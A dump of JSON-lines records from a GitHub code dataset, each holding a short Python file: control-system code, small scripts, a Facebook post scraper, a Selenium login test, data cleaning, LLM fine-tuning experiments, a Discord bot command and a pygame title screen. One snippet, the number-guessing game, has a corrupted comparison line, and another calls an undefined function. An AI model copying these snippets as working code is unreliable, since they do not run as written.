name='b', dtype=tf.float32)\n\ny = tf.Variable(tf.add(tf.multiply(a, x), b))\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"logs\", sess.graph)\n print(sess.run(y))\n\ntf.where()","repo_name":"enningxie/Coolixz","sub_path":"Tensorflow/from_blog/tensorflow01.py","file_name":"tensorflow01.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8928202496","text":"import numpy as np\r\n#import import_ipynb\r\nimport massSpringParam1 as P\r\n\r\nclass massSpringController:\r\n def __init__(self):\r\n self.observer_state = np.array([\r\n [0.0], # estimate of z\r\n [0.0], # estimate of z_hat\r\n [0.0], # estimate of disturbance\r\n ])\r\n self.tau_d1 = 0.0 #control force, delayed 1 sample\r\n self.integrator = 0.0 # integrator\r\n self.error_d1 = 0.0 # error signal, delyaed 1 sample\r\n self.K = P.K # state feedback gain\r\n self.ki = P.ki # Input gain\r\n self.L = P.L # observer gain\r\n self.Ld = P.Ld\r\n self.L2 = P.L2\r\n self.A2 = P.A2 # system model\r\n self.B2 = P.B2\r\n self.C2 = P.C2\r\n self.limit = P.tau_max # maximum force\r\n self.Ts = P.Ts # sample rate of controller\r\n \r\n def update(self, z_r, y_m):\r\n #update the observer and extract z_hat\r\n x_hat, d_hat = self.update_observer(y_m)\r\n z_hat = x_hat.item(0)\r\n \r\n #integrate error\r\n error = z_r - z_hat\r\n self.integrateError(error)\r\n \r\n #feedback linearizing force tau_fl\r\n tau_fl = P.k*z_hat\r\n \r\n # Compute the state feedback controller\r\n tau_tilde = -self.K @ x_hat - self.ki * self.integrator - d_hat\r\n \r\n #compute total force\r\n tau = self.saturate(tau_fl + tau_tilde.item(0))\r\n self.tau_d1 = tau\r\n \r\n return tau, x_hat, d_hat\r\n \r\n def integrateError(self, error):\r\n self.integrator = self.integrator + (self.Ts/2.0)*(error + self.error_d1)\r\n self.error_d1 = error\r\n \r\n def update_observer(self, y_m):\r\n #update the observer using RK4 integration\r\n F1 = self.observer_f(self.observer_state, y_m)\r\n F2 = self.observer_f(self.observer_state + self.Ts / 2 * F1, y_m)\r\n F3 = self.observer_f(self.observer_state + self.Ts / 2 * F2, y_m)\r\n F4 = self.observer_f(self.observer_state + self.Ts * F3, y_m)\r\n self.observer_state += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)\r\n x_hat = np.array([[self.observer_state.item(0)],\r\n [self.observer_state.item(1)]])\r\n d_hat = self.observer_state.item(2)\r\n\r\n return x_hat, d_hat\r\n \r\n def observer_f(self, x_hat, y_m):\r\n #compute feedback linearizing force tau_fl\r\n z_hat = x_hat.item(0)\r\n tau_fl = P.k*z_hat\r\n \r\n # xhatdot = A*xhat + B*(u-ue) + L(y-C*xhat)\r\n xhat_dot = self.A2 @ x_hat + self.B2 * (self.tau_d1 - tau_fl) + self.L2 * (y_m - self.C2 @ x_hat)\r\n\r\n return xhat_dot\r\n \r\n def saturate(self, u):\r\n if abs(u) > self.limit:\r\n u = self.limit*np.sign(u)\r\n return u","repo_name":"Shirshakk-P/ControlSystems","sub_path":"x14/massSpringController.py","file_name":"massSpringController.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33570837797","text":"import random\nguess=5\nsecret_no=random.randint(1,101)\nn=1\nguess=int(input(\"enter the no: \"))\nwhile guess!=secret_no:\n if secret_noguess:\n print(\"no is greater than \",guess)\n n=n+1\n guess=int(input(\"enter the no: \"))\n \nprint(\"yes! you are right\")\nprint(\"you took chance:\",n )\n\n","repo_name":"adnan378/Notepad","sub_path":"Notepad/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"6141152677","text":"# .pal2nal to .fasta converter\ndef pal2nal_2_fasta(lines):\n# converts .pal2nal format to .fasta format\n# input:\n# lines - a list with lines of .pal2nal file as values\n# output:\n# a list with lines of .fasta format as values\n # delete first line in list\n lines = lines[1:len(lines)]\n\n # delete \"\\n\" in the and of every string\n for i in range(len(lines)):\n lines[i] = lines[i].rstrip()\n\n # find number of parts that make up a sequence line (it might be the same for all sequences in file because they are aligned)\n seq_parts_num = 0\n for i in range(1, len(lines)):\n line = lines[i]\n marker = \"sequence\"\n seq_parts_num += 1\n for symbol in line.lower():\n if symbol not in \"atgc\":\n marker = \"header\"\n break\n if marker == \"header\":\n seq_parts_num -= 1\n break\n\n # compute the quantity of lines between headers, number of headers\n header_gap = seq_parts_num + 1\n header_num = int(len(lines) / header_gap)\n\n # make list of header indexes in \"lines\" list\n header_indexes = []\n for i in range(header_num):\n header_indexes.append(i * header_gap)\n\n # add \">\" to the start of header, \"\\n\" to the end of header, \"\\n\" to the end of sequence\n for i in header_indexes:\n lines[i] = f\">{lines[i]}\\n\"\n lines[i + seq_parts_num] = f\"{lines[i + seq_parts_num]}\\n\"\n return(lines)\n","repo_name":"sofya-d/My_code","sub_path":"python_projects/Pal2nal_to_fasta.py","file_name":"Pal2nal_to_fasta.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16215947809","text":"n = int(input())\nres = []\nfor i in range(0, n):\n s = input()\n if(len(s) <= 10):\n res.append(s)\n else:\n fin = s[0] + str(len(s[1:-1])) + s[-1]\n res.append(fin)\nfor i in res:\n print(i)","repo_name":"AmunRha/ChallengeSet1","sub_path":"Codeforces/71A.py","file_name":"71A.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20497071960","text":"import apify_client\nfrom facebook_scraper import get_posts\n\nfrom config.db_Connexion import dbConnection\n#Using this Scrapper speed up the process of your IP and Facebook getting banned\nclass pageScrapper:\n NUM_PAGES = 5\n def __init__(self,page_id):\n self.page_id = page_id\n self.db_cnx = dbConnection()\n self.post_collection = self.db_cnx.getCollection('posts')\n self.comments_collection = self.db_cnx.getCollection('comments')\n self.full_posts_collection = self.db_cnx.getCollection('full_posts')\n pass\n def getPosts(self):\n allPosts = []\n posts =get_posts(self.page_id,\n pages = self.NUM_PAGES,\n options={\"progress\": True},\n #cookies=\"\"\n )\n self.full_posts_collection.insert_many(posts)\n for post in posts:\n if(not(post['comments'] == 0 )):\n #print(post)\n #WORKING\n print('Scrapped a Post : ',post['post_id'],\" From page :\",self.page_id)\n allPosts.append(post['post_id'])\n return allPosts\n\nclass apifyPageScrapper:\n key =\"\"\n actor_id = 'apify/facebook-posts-scraper'\n input_data = {\n \"maxRequestRetries\": 10,\n \"proxy\": {\n \"useApifyProxy\": True,\n \"apifyProxyGroups\": [\n \"RESIDENTIAL\"\n ],\n \"apifyProxyCountry\": \"TN\"\n },\n \"resultsLimit\": 10,\n \"startUrls\": [\n {\n \"url\": \"https://www.facebook.com/Presidence.tn\"\n },\n {\n \"url\": \"https://www.facebook.com/Sntri-الشركة-الوطنية-للنقل-بين-المدن-1733465710262703\"\n },\n {\n \"url\": \"https://www.facebook.com/Wallyscar\"\n },\n {\n \"url\": \"https://www.facebook.com/MunicipaliteLaGoulette/\"\n },\n {\n \"url\": \"https://www.facebook.com/Nahda.Tunisia\"\n }\n ]\n }\n def __init__(self):\n self.db_cnx = dbConnection()\n self.post_collection = self.db_cnx.getCollection('posts')\n self.client = apify_client.ApifyClient(self.key)\n def runSync(self):\n execution_info = self.client.actor(actor_id=self.actor_id).call(\n run_input=self.input_data,\n memory_mbytes = 4096,\n timeout_secs= 60*8\n )\n execution_id = execution_info['id']\n execution_details = self.client.run(run_id=execution_id).wait_for_finish()\n return execution_details\n def getItems(self,datasetId):\n execution_data = self.client.dataset(dataset_id=datasetId).list_items()\n for data in execution_data.items:\n if 'postId' in data :\n if(not(self.post_collection.find_one({\"postId\":data['postId']}))):\n self.post_collection.insert_one(data)\n else:\n pass\n elif 'postFacebookId' in data:\n if(not(self.post_collection.find_one({\"postId\":data['postFacebookId']}))):\n self.post_collection.insert_one({\"pageId\":data['facebookId'],\"postId\":data['postFacebookId']})\n else:\n pass\n else:\n pass\n return execution_data.items\n\n","repo_name":"NourTabib/facebook-comments-stream","sub_path":"scrapper/scrappers/pageScrapper.py","file_name":"pageScrapper.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70692964294","text":"from selenium import webdriver\nimport pytest\n#import time\n\nclass TestOrangeHRMTest():\n\n @pytest.fixture()\n def setup(self):\n global driver\n self.driver=webdriver.Chrome(\"C://Users/anaso/PycharmProjects/Selenium/Selenium Scripts/Drivers/chromedriver.exe\")\n self.driver.maximize_window()\n print(\"Browser Started\\n\")\n yield\n self.driver.close()\n\n\n def test_HomePageTitle(self,setup):\n self.driver.get(\"https://opensource-demo.orangehrmlive.com/index.php/dashboard\")\n #time.sleep(2)\n assert self.driver.title==\"OrangeHRM\"\n print(\"Title is matched\")\n\n def test_Login(self,setup):\n self.driver.get(\"https://opensource-demo.orangehrmlive.com/index.php/dashboard\")\n self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n self.driver.find_element_by_id(\"btnLogin\").click()\n assert self.driver.title==\"OrangeHRM\"\n print(\"Login Successfull\")\n\n\n\n\n\n","repo_name":"anandsoraganvi/webautomation","sub_path":"Selenium/Selenium Scripts/Scripts/test_Orange.py","file_name":"test_Orange.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40497762738","text":"\"\"\"\nThis package of functions cleans the raw data from the Austin Animal Center datasets.\nIt includes:\n- prep_outcomes_file\n- prep_intakes_file\n- merge_files\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n## Clean Outcomes\n\ndef prep_outcomes_file(outcomes):\n \"\"\"The raw file comes in with: \n - dates not in datetime format\n - column names have mixed cases and spaces\n - an age variable that needs to be replaced\n - unnecessary columns tht can be dropped\n - create some additional date variables to help merge later\n \n arguments\n outcomes: the raw file from the website\n returns clean dataset\"\"\"\n # Make column names easier to use\n outcomes.columns = outcomes.columns.str.lower()\n outcomes.columns = outcomes.columns.str.replace(' ', '_')\n\n # Convert date formats\n outcomes['date_o'] = outcomes.datetime.apply(lambda x: x[:10])\n\n outcomes['date_o'] = pd.to_datetime(outcomes['date_o'], format='%m/%d/%Y')\n outcomes['dob'] = pd.to_datetime(outcomes['date_of_birth'], format='%m/%d/%Y')\n\n # Create new age variable\n outcomes['age'] = outcomes.date_o - outcomes.dob\n outcomes['years_old'] = outcomes.age.apply(lambda x: x.days/365)\n\n outcomes['year'] = outcomes['date_o'].apply(lambda x: x.year)\n\n outcomes['month_o'] = outcomes['date_o'].apply(lambda x: x.month)\n outcomes['year'] = outcomes['date_o'].apply(lambda x: x.year)\n outcomes['weekday_o'] = outcomes['date_o'].apply(lambda x: x.weekday())\n\n outcomes.drop(columns = ['datetime', 'date_of_birth','age_upon_outcome', 'date_of_birth', 'breed', 'color','animal_type'], inplace=True )\n return outcomes\n\n\n# Let's repeat the cleaning process for intake date and create some new variables\n\ndef prep_intakes_file(intakes):\n \"\"\"The raw file comes in with: \n - dates not in datetime format\n - column names have mixed cases and spaces\n - unnecessary columns tht can be dropped\n - create some additional date variables to help merge later\n \n arguments\n intakes: the raw file from the website\n returns clean dataset\"\"\"\n\n # Update column names to be more friendly\n\n intakes.columns = intakes.columns.str.lower()\n intakes.columns = intakes.columns.str.replace(' ', '_')\n\n # Convert date formats\n intakes['date_i'] = intakes.datetime.apply(lambda x: x[:10])\n\n intakes['date_i'] = pd.to_datetime(intakes['date_i'], format='%m/%d/%Y')\n\n # Create more date variables\n intakes['month_i'] = intakes['date_i'].apply(lambda x: x.month)\n intakes['year'] = intakes['date_i'].apply(lambda x: x.year)\n intakes['weekday_i'] = intakes['date_i'].apply(lambda x: x.weekday())\n\n intakes.drop(columns =['datetime','monthyear','age_upon_intake'] , inplace = True)\n return intakes\n\ndef merge_files(intakes, outcomes):\n \"\"\"\n Merges intakes and outcomes datasets to create unique line for each animal in the shelter to capture full stories for each animal\n takes intakes file then outcomes file as arguments\n returns merged dataset\n \"\"\"\n # Merge intakes and outcomes on animal id and year\n animal_shelter_df = pd.merge(intakes, \n outcomes, \n on=['animal_id', 'year'], \n how='left', \n suffixes=('_intake', '_outcome'))\n\n # Filters out animals who have yet to have outcomes and keeps animals where outcome data is later than intake date\n animal_shelter_df = animal_shelter_df[(~animal_shelter_df['date_o'].isna()) \n & (animal_shelter_df['date_o'] > animal_shelter_df['date_i'])]\n\n # Creates new days_in_shelter variable\n animal_shelter_df['days_in_shelter'] = (animal_shelter_df['date_o'] - animal_shelter_df['date_i']).dt.days\n \n # Sorts the column names to be alphabetical\n animal_shelter_df = animal_shelter_df[animal_shelter_df.columns.sort_values()]\n return animal_shelter_df\n","repo_name":"learn-co-curriculum/dsc-mod1-template","sub_path":"code_folder/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13191769111","text":"'''\n121. 买卖股票的最佳时机\n给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。\n\n你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。\n\n返回你可以从这笔交易中获取的最大利润。如果你不能获取任何利润,返回 0 。\n示例 1:\n\n输入:[7,1,5,3,6,4]\n输出:5\n解释:在第 2 天(股票价格 = 1)的时候买入,在第 5 天(股票价格 = 6)的时候卖出,最大利润 = 6-1 = 5 。\n 注意利润不能是 7-1 = 6, 因为卖出价格需要大于买入价格;同时,你不能在买入前卖出股票。\n示例 2:\n\n输入:prices = [7,6,4,3,1]\n输出:0\n解释:在这种情况下, 没有交易完成, 所以最大利润为 0。\n提示:\n1 <= prices.length <= 105\n0 <= prices[i] <= 104\n'''\nclass Solution:\n # 最多交易一次\n def maxProfit(self, prices) -> int:\n if not prices:return 0\n ret = 0\n #profit[i][j] 第i天手上持股状态j时,持有的现金数\n profit = [[0 for i in range(3)] for i in range(len(prices))]\n # 没有股票 买入股票 卖出股票\n profit[0][0], profit[0][1], profit[0][2] = 0, -prices[0], 0\n for i in range(1, len(prices)):\n profit[i][0] = profit[i-1][0]\n profit[i][1] = max(profit[i-1][1], profit[i-1][0]-prices[i])\n profit[i][2] = profit[i-1][1] + prices[i]\n # ret = max(ret, profit[i][0], profit[i][1], profit[i][2])\n # 如果为1的话说明手上游没有出售的股票,正常是不会考虑这个的,最后都会将股票卖出,所以可以去掉 profit[i][1],为了工整也可以加入\n ret = max(ret, profit[i][2])\n return ret\n\nif __name__ == '__main__':\n s = Solution()\n prices = [7, 1, 5, 3, 6, 4]\n print('1', s.maxProfit(prices))\n prices = [7, 6, 4, 3, 1]\n print('1', s.maxProfit(prices))\n","repo_name":"electrolyteJ/algorithms","sub_path":"src/basic/_13_DynamicProgrammingAlgorithm_121.py","file_name":"_13_DynamicProgrammingAlgorithm_121.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34974835052","text":"import random \n \ndef SystematicSampling(dataMat,number): \n \n length=len(dataMat) \n k=length/number \n sample=[] \n i=0 \n if k>0 : \n while len(sample)!=number: \n sample.append(dataMat[0+i*k]) \n i+=1 \n return sample \n else : \n return RandomSampling(dataMat,number) ","repo_name":"jimenbian/GarvinBook","sub_path":"3.1/Systematic_sampling.py","file_name":"Systematic_sampling.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"44"} +{"seq_id":"17205023236","text":"from dotenv import load_dotenv\nfrom deepchem.molnet import load_tox21\nimport numpy as np\nfrom gptchem.tuner import Tuner\nfrom gptchem.gpt_classifier import GPTClassifier\nfrom gptchem.evaluator import evaluate_classification\nfrom fastcore.xtras import save_pickle\nfrom imblearn.under_sampling import RandomUnderSampler\nimport time\nimport os\nimport openai\n\n\ndef get_timestr():\n return time.strftime(\"%Y%m%d-%H%M%S\")\n\n\nload_dotenv(\"../../../.env\", override=True)\n\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\nname_mapping = {\n \"NR-AR\": \"activity in the Androgen receptor, full length assay\",\n \"NR-AR-LBD\": \"activity in the Androgen receptor, ligand binding domain assay\",\n \"NR-AhR\": \"activity in the Aryl hydrocarbon receptor assay\",\n \"NR-Aromatase\": \"activity in the Aromatase assay\",\n \"NR-ER\": \"activity in the Estrogen receptor alpha, full length assay\",\n \"NR-ER-LBD\": \"activity in the Estrogen receptor alpha, LBD assay\",\n \"NR-PPAR-gamma\": \"activity in the PPAR-gamma receptor assay\",\n \"SR-ARE\": \"activity in the antioxidant responsive element assay\",\n \"SR-ATAD5\": \"activity in the ATPase Family AAA Domain Containing 5e assay\",\n}\n\n\ntarget_number_mapping = {\n \"NR-AR\": 0,\n \"NR-AR-LBD\": 1,\n \"NR-AhR\": 2,\n \"NR-Aromatase\": 3,\n \"NR-ER\": 4,\n \"NR-ER-LBD\": 5,\n \"NR-PPAR-gamma\": 6,\n \"SR-ARE\": 7,\n \"SR-ATAD5\": 8,\n}\n\n\ndef run_experiment(target, num_train_points, random_undersample, num_test_points, seed):\n tox21_tasks, tox21_datasets, transformers = load_tox21(seed=seed, reload=False)\n train_dataset, valid_dataset, test_dataset = tox21_datasets\n\n X_train, y_train = train_dataset.ids, train_dataset.y[:, target_number_mapping[target]]\n X_test, y_test = test_dataset.ids, test_dataset.y[:, target_number_mapping[target]]\n\n if num_train_points == \"max\":\n num_train_points = len(X_train)\n if random_undersample:\n sampler = RandomUnderSampler(random_state=seed)\n\n X_train, y_train = sampler.fit_resample(X_train.reshape(-1, 1), y_train)\n\n train_ids = np.random.choice(np.arange(len(X_train)), num_train_points, replace=False)\n test_ids = np.random.choice(np.arange(len(X_test)), num_test_points, replace=False)\n\n X_train = X_train[train_ids]\n y_train = y_train[train_ids]\n\n X_test = X_test[test_ids]\n y_test = y_test[test_ids]\n n_epochs = 8\n\n tuner = Tuner(n_epochs=n_epochs, learning_rate_multiplier=0.02, wandb_sync=False)\n classifier = GPTClassifier(\n target,\n tuner=tuner,\n save_valid_file=True,\n querier_settings={\"max_tokens\": 10},\n )\n\n classifier.fit(X_train, y_train)\n\n y_pred = classifier.predict(X_test)\n\n results = evaluate_classification(y_test, y_pred)\n\n report = {\n \"target\": target,\n \"num_train_points\": num_train_points,\n \"num_test_points\": num_test_points,\n \"random_undersample\": random_undersample,\n \"seed\": seed,\n \"y_pred\": y_pred,\n \"y_test\": y_test,\n \"n_epochs\": n_epochs,\n \"short_name\": True,\n **results,\n }\n\n timestr = get_timestr()\n\n save_pickle(\n f\"reports/{timestr}-{target}-{num_train_points}-{random_undersample}-{seed}-{n_epochs}.pkl\",\n report,\n )\n\n\ndef get_grid(random_undersample):\n if random_undersample:\n return [10, 50, 100]\n else:\n return [10, 100, 6000, \"max\"]\n\n\nif __name__ == \"__main__\":\n for seed in range(3):\n seed = seed + 54535\n for random_undersample in [True, False][::-1]:\n for target in list(name_mapping.keys())[::-1]:\n for num_train_points in get_grid(random_undersample)[::-1]:\n try:\n run_experiment(target, num_train_points, random_undersample, 500, seed)\n time.sleep(60)\n except Exception as e:\n print(e)\n time.sleep(60)\n","repo_name":"kjappelbaum/gptchem","sub_path":"experiments/03_classification/tox21/run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"44"} +{"seq_id":"2825378069","text":"@bot.command()\nasync def dovui(ctx):\n try:\n get = requests.get('https://api.phamvandien.xyz/game/dovui')\n data_txt = get.text\n data_json = json.loads(data_txt)\n data = {}\n question = data_json['data']['question']\n option = data_json['data']['option']\n correct = data_json['data']['correct'] \n msg = f'đây là câu hỏi của bạn: {question}'\n stt = 1\n for i in option:\n msg += f'\\n{stt}.{i}'\n data[str(stt)] = i\n stt += 1\n msg += '\\nreply tin nhắn theo số thứ tự các đáp án để trả lời'\n send = await ctx.send(msg)\n def check(m):\n return m.author.id == ctx.author.id and m.channel == ctx.channel and m.reference is not None and m.reference.message_id == send.id\n message = await bot.wait_for('message', check=check)\n try:\n if data[str(message.content)] == correct:\n await ctx.send(f'bạn đã trả lời đúng, đáp án là {correct}')\n else:\n await ctx.send(f'sai rồi, đáp án là {correct}')\n except Exception as e:\n print(e)\n await ctx.send(f'chỉ được trả lời theo số thứ tự các đáp án')\n except Exception as e:\n print(e)\n await ctx.send(f\"lệnh bạn đang sử dụng đã xảy ra lỗi, hãy báo cáo về admin bằng lệnh {get_prefix()[str(ctx.message.guild.id)]['prefix']}callad, hoặc câu trả lời của bạn không phải là một con số\")\n","repo_name":"CCcutcanh/test_discord_bot","sub_path":"dovui.py","file_name":"dovui.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31303259437","text":"import pygame\nimport time\nimport gameFunctions as gF\n\n\nclass TitleScreen:\n def __init__(self, screen, settings):\n self.__screen = screen\n self.__settings = settings\n self.__font = pygame.font.SysFont('impact', 200)\n self.__space_text = self.__font.render('SPACE', False, (255, 255, 255))\n self.__invaders_text = self.__font.render('INVADERS', False, (0, 255, 0))\n\n self.__playImageWhite = pygame.image.load('Images/playbuttonwhite.png')\n self.__playRectWhite = self.__playImageWhite.get_rect()\n self.__playRectWhite.bottom = self.__settings.get_screen_height() - 125\n self.__playRectWhite.centerx = self.__settings.get_screen_width() / 2\n\n self.__playImageGreen = pygame.image.load('Images/playbuttongreen.png')\n self.__playRectGreen = self.__playImageGreen.get_rect()\n self.__playRectGreen.bottom = self.__playRectWhite.bottom\n self.__playRectGreen.centerx = self.__playRectWhite.centerx\n\n self.__highScoresImageWhite = pygame.image.load('Images/High Scores White.png')\n self.__whiteScoresRect = self.__highScoresImageWhite.get_rect()\n self.__whiteScoresRect.top = self.__playRectGreen.bottom + 5\n self.__whiteScoresRect.centerx = self.__playRectGreen.centerx\n\n self.__highScoresImageGreen = pygame.image.load('Images/High Scores Green.png')\n self.__greenScoresRect = self.__highScoresImageGreen.get_rect()\n self.__greenScoresRect.top = self.__whiteScoresRect.top\n self.__greenScoresRect.centerx = self.__whiteScoresRect.centerx\n\n # #######################################################################\n # Alien Images and Rects #\n ###########################################################################\n self.__ufoAlienImage = pygame.image.load('Images/ufo.png')\n self.__ufoAlienRect = self.__ufoAlienImage.get_rect()\n self.__ufoAlienRect.bottom = self.__playRectWhite.top - 10\n self.__ufoAlienRect.centerx = self.__playRectWhite.centerx - 150\n\n self.__purpleAlienImage = pygame.image.load('Images/Purple Alien1.png')\n self.__purpleAlienRect = self.__purpleAlienImage.get_rect()\n self.__purpleAlienRect.bottom = self.__ufoAlienRect.top\n self.__purpleAlienRect.centerx = self.__ufoAlienRect.centerx\n\n self.__blueAlienImage = pygame.image.load('Images/Blue Alien1.png')\n self.__blueAlienRect = self.__blueAlienImage.get_rect()\n self.__blueAlienRect.bottom = self.__purpleAlienRect.top\n self.__blueAlienRect.centerx = self.__purpleAlienRect.centerx\n\n self.__greenAlienImage = pygame.image.load('Images/Green Alien1.png')\n self.__greenAlienRect = self.__greenAlienImage.get_rect()\n self.__greenAlienRect.bottom = self.__blueAlienRect.top\n self.__greenAlienRect.centerx = self.__blueAlienRect.centerx\n\n # #######################################################################\n # Point Images and Rects #\n ###########################################################################\n self.__tenPointsImage = pygame.image.load('Images/ten points.png')\n self.__tenPointsRect = self.__tenPointsImage.get_rect()\n self.__tenPointsRect.left = self.__greenAlienRect.right\n self.__tenPointsRect.centery = self.__greenAlienRect.centery\n\n self.__twentyPointsImage = pygame.image.load('Images/twenty points.png')\n self.__twentyPointsRect = self.__twentyPointsImage.get_rect()\n self.__twentyPointsRect.left = self.__blueAlienRect.right\n self.__twentyPointsRect.centery = self.__blueAlienRect.centery\n\n self.__fortyPointsImage = pygame.image.load('Images/forty points.png')\n self.__fortyPointsRect = self.__fortyPointsImage.get_rect()\n self.__fortyPointsRect.left = self.__purpleAlienRect.right\n self.__fortyPointsRect.centery = self.__purpleAlienRect.centery\n\n self.__unknownPointsImage = pygame.image.load('Images/unknown points.png')\n self.__unknownPointsRect = self.__unknownPointsImage.get_rect()\n self.__unknownPointsRect.left = self.__ufoAlienRect.right\n self.__unknownPointsRect.centery = self.__ufoAlienRect.centery\n\n self.create_high_score_file()\n\n def title_loop(self):\n self.__screen.fill(self.__settings.get_bg_color())\n self.__screen.blit(self.__space_text, (self.__settings.get_screen_width() / 2.75, 0))\n self.__screen.blit(self.__invaders_text, (self.__settings.get_screen_width() / 3.35, 175))\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n pygame.display.flip()\n\n self.__screen.blit(self.__greenAlienImage, self.__greenAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__tenPointsImage, self.__tenPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__blueAlienImage, self.__blueAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__twentyPointsImage, self.__twentyPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__purpleAlienImage, self.__purpleAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__fortyPointsImage, self.__fortyPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__ufoAlienImage, self.__ufoAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__unknownPointsImage, self.__unknownPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n pygame.mouse.set_visible(True)\n\n while self.check_mouse_events():\n if self.__playRectWhite.collidepoint(pygame.mouse.get_pos()):\n self.__screen.blit(self.__playImageGreen, self.__playRectGreen)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n elif self.__whiteScoresRect.collidepoint(pygame.mouse.get_pos()):\n self.__screen.blit(self.__highScoresImageGreen, self.__greenScoresRect)\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n else:\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n pygame.display.flip()\n\n def check_mouse_events(self):\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.__playRectGreen.collidepoint(pygame.mouse.get_pos()):\n self.__screen.fill(self.__settings.get_bg_color())\n return False\n elif self.__greenScoresRect.collidepoint(pygame.mouse.get_pos()):\n self.high_score_screen()\n self.title_loop()\n return False\n return True\n\n def high_score_screen(self):\n self.__screen.fill(self.__settings.get_bg_color())\n font = pygame.font.Font('Fonts/PixFont.ttf', 40)\n text_color = self.__settings.get_bullet_color()\n image_rect = None\n image_one_rect = None\n high_score_image = font.render(\"HIGH SCORES!\", True, text_color, self.__settings.get_bg_color())\n high_score_rect = high_score_image.get_rect()\n high_score_rect.centerx = self.__settings.get_screen_width() / 2\n high_score_rect.y = 100\n self.__screen.blit(high_score_image, high_score_rect)\n pygame.display.flip()\n try:\n with open(\"high score.txt\") as f:\n score = f.readline()\n if score == \"\":\n return\n score = score.strip('\\n')\n image_one = font.render(\"Score: {}\".format(score), True, text_color, self.__settings.get_bg_color())\n image_one_rect = image_one.get_rect()\n image_one_rect.centerx = self.__settings.get_screen_width() / 2\n image_one_rect.y = 200\n self.__screen.blit(image_one, image_one_rect)\n pygame.display.flip()\n time.sleep(0.2)\n for count in range(0, 10):\n score = f.readline()\n if score == \"\":\n break\n score = score.strip('\\n')\n image = font.render(\"Score: {}\".format(score), True, text_color, self.__settings.get_bg_color())\n image_rect = image.get_rect()\n image_rect.left = image_one_rect.left\n image_rect.top = image_one_rect.bottom\n image_one_rect = image_rect\n self.__screen.blit(image, image_rect)\n pygame.display.flip()\n time.sleep(0.2)\n except FileNotFoundError:\n pass\n continue_image = font.render(\"PRESS SPACE TO CONTINUE, Q TO EXIT\", True, text_color)\n continue_rect = continue_image.get_rect()\n try:\n continue_rect.centerx = image_rect.centerx\n continue_rect.top = image_rect.bottom + 50\n except AttributeError:\n continue_rect.centerx = image_one_rect.centerx\n continue_rect.top = image_one_rect.bottom + 50\n self.__screen.blit(continue_image, continue_rect)\n pygame.display.flip()\n while gF.wait_for_space():\n continue\n\n @staticmethod\n # Ensures a high score file is inside directory. If one is not there, makes one. If it is there, it does nothing.\n def create_high_score_file():\n try:\n with open('high score.txt', 'r') as f:\n f.close()\n except FileNotFoundError:\n with open('high score.txt', 'w') as f:\n f.write(\"0000\")\n","repo_name":"Mbraun5/Space-Invaders","sub_path":"titleScreen.py","file_name":"titleScreen.py","file_ext":"py","file_size_in_byte":10080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43694397341","text":"from Bio import SeqIO\nfrom Bio.PDB import *\n\n\n# XXXX_anything, I want firts 4 characters in lowercase\ndef TrimPDBName(fastaName):\n return fastaName[:4].lower()\n\n\n# XXXX_A_anything, I want A\ndef 